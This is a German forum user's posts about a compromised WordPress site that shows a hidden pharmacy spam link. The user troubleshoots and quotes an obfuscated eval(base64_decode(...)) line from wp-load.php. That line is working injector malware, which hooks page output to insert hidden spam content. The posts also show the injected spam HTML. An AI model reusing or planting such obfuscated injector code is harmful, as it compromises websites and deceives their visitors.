Beiträge von Sgt.DC

    Ich habe die Ursache herausgefunden:

    Und zwar habe ich folgenden Code-Schnipsel entfernt:

    PHP
    <?php wp_footer(); ?>

    Und siehe da, kein Spam Link mehr!

    Ist wp_footer eine php Datei? ich habe im Wordpress Ordner keinerlei Datei finden können die wp_footer heisst. Falls solch eine doch existiert, wo befindet sich diese?
    dankeeeee :)

    ja also ich hab einen datenbank dump gemacht und die komplette wordpress website + datenbank dump lokal auf meinem rechner mit xamp installiert. Ergebnis war, dass kein Spam Link erschienen ist. Ich habe nun Goneo dieses Problem geschildert und sie gebeten, sich darum zu kümmern, da ich leider kein phpmyadmin / php profi bin. Mal gespannt was sie antworten werden.

    Hi, ich hab nun den wordpress blog lokal mit xamp installiert und siehe da, kein Spam Link im Code!

    Das bedeutet nun, dass die Datenbank infiziert ist?

    Ich hab auch alle Plugins mal deaktiviert, kein Effekt. Dann habe ich mal das AntiVir Plugin von Segej Müller installiert und laufen lassen, keinerlei Warnmeldung.

    Ich hab mich nun mal ein bisschen in phpmyadmin umgeschaut, jedoch fällt mir nichts besonderes auf. Das einzige was mir jetzt beim durchsuchen der Tabellen auffiel war in der Tabelle wp_options eine option_id 33 mit dem option_name "hack_file". wenn ich diese bearbeite, steht jedoch nichts drin. Nach was müsste ich dort denn suchen?
    Ist dieser Eintrag normal? Vielen Dank

    Vielen Dank schonmal für eure Hilfe, ich habe in den Dateien mal nach "base64" un "rot13" gesucht, bei "rot13" keine Treffer und bei "base64" kamen viele Treffer (54 Treffer in 1106 Dateien). Woher weiss ich nun, welches Schadcode ist und welches nicht :/

    Verdächtig kam mir folgender Treffer in der WP_Load.php vor:

    PHP
    <? eval(base64_decode("aWYgKCFmdW5jdGlvbl9leGlzdHMoJ19fZ29vZ2xlX2FuYWx5dGljc19vYmgnKSl7CmZ1bmN0aW9uIF9fZ29vZ2xlX2FuYWx5dGljc19vYmggKCRjKXsKICAgICRpID0gQGluY2x1ZGUgJ3dwLWluY2x1ZGVzL2ltYWdlcy9zbWlsaWVzL2NsYXNzLnBocCc7CiAgICAkaSA9ICc8ZGl2IHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTsgbGVmdDoxMDQ0cHg7IHRvcDogLTIwMDBweDsiPicgLiAkaSAuICc8L2Rpdj4nOwogICAgJHRtcGRpciA9ICd3cC1pbmNsdWRlcy9pbWFnZXMvd2x3Lyc7CiAgICAkcGdpZCA9IEAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXTsKICAgIGlmIChlbXB0eSgkcGdpZCkpICRwZ2lkID0gX19GSUxFX187CiAgICAkZiA9ICR0bXBkaXIubWQ1KCc0MjopJy4kcGdpZCk7CiAgICBpZiAoIWZpbGVfZXhpc3RzKCRmKSkKICAgIHsKICAgICAgICAkcG9zID0gbXRfcmFuZCgwLCAxMCkgLyAxMDsKICAgICAgICBmaWxlX3B1dF9jb250ZW50cygkZiwgJHBvcyk7CiAgICB9CiAgICBlbHNlICRwb3MgPSBmaWxlX2dldF9jb250ZW50cygkZik7CiAgICAkYzIgPSBzdHJ0b2xvd2VyKCRjKTsKICAgICR0YWdzID0gYXJyYXkoJzwvcD4nLCAnPC9kaXY+JywgJzwvdGFibGU+Jyk7CiAgICAkaW5qcG9zID0gc3RycG9zKCRjMiwgJzwvYm9keT4nKSBvciBzdHJsZW4oJGMpOwogICAgJHAgPSByb3VuZCgkaW5qcG9zICogJHBvcyk7CiAgICBpZiAoJHAgPCAwKSAkcCA9IDA7IGlmICgkcCA+ICRpbmpwb3MpICRwID0gJGluanBvczsKICAgIGZvcmVhY2ggKCR0YWdzIGFzICR0YWcpIHsKICAgICAgICAkdCA9IHN0cnBvcygkYzIsICR0YWcsICRwKTsKICAgICAgICBpZiAoJHQpCiAgICAgICAgewogICAgICAgICAgICAkaW5qcG9zID0gJHQgKyBzdHJsZW4oJHRhZyk7CiAgICAgICAgICAgIGJyZWFrOwogICAgICAgIH0KICAgIH0KICAgIHJldHVybiBzdWJzdHIoJGMsIDAsICRpbmpwb3MpIC4gJGkgLiBzdWJzdHIoJGMsICRpbmpwb3MpOwogICAgfQogICAgQG9iX3N0YXJ0KF9fZ29vZ2xlX2FuYWx5dGljc19vYmgpOwp9")); ?>

    Ansonsten werd ich mal die Wordpress Installation lokal mit XAMP installieren und testen, melde mich dann wieder :)

    Hi, da ich nun leider mit meinem Latein am Ende bin, bitte ich um Hilfe. Es geht um folgendes:

    Auf dieser Seite:

    http://www.caspar-coaching.de/wordpress/impressum/

    hat sich oben rechts im Header ein Spam Link eingenistet.

    Ich habe das ganze mit Firebug untersucht und folgenen Code Abschnitt ausfündig gemacht, der sich im Footer eingenistet hat:

    HTML
    <div style="position:absolute; left:1044px; top: -2000px;"><a href="http://2010jewelball.com/index.php?post=tylenol">tylenol generic</a> tylenol generic</div>

    Ich habe mir nun die komplette Wordpress Installation herunter geladen und sämtliche Dateien (1100) mit Hilfe von Dreamweaver nach diesem Code-Segment durchsucht: Ergebnis: unauffindbar!

    Dann habe ich verschiedene Themes installiert und probeweise aktiviert, der Spam Link bleibt erhalten... Aber irgendwo muss sich dieser Link doch eingenistet haben... ich verstehe das einfach nicht :shock:

    Dann ist mir noch etwas seltsames aufgefallen: Immer wenn ich eingelggt bin und die ADMIN BAR aktiv ist, ist der Spam Link nicht mehr zu sehen. Sobald die Admin Bar ausgeblendet ist (z.B. im ausgeloggten Zustand), ist der Spam Link zu sehen.

    Es handelt sich um die aktuelle WP Version.

    Hatte jemand schon mal so ein Problem? :confused: Bitte um Hilfe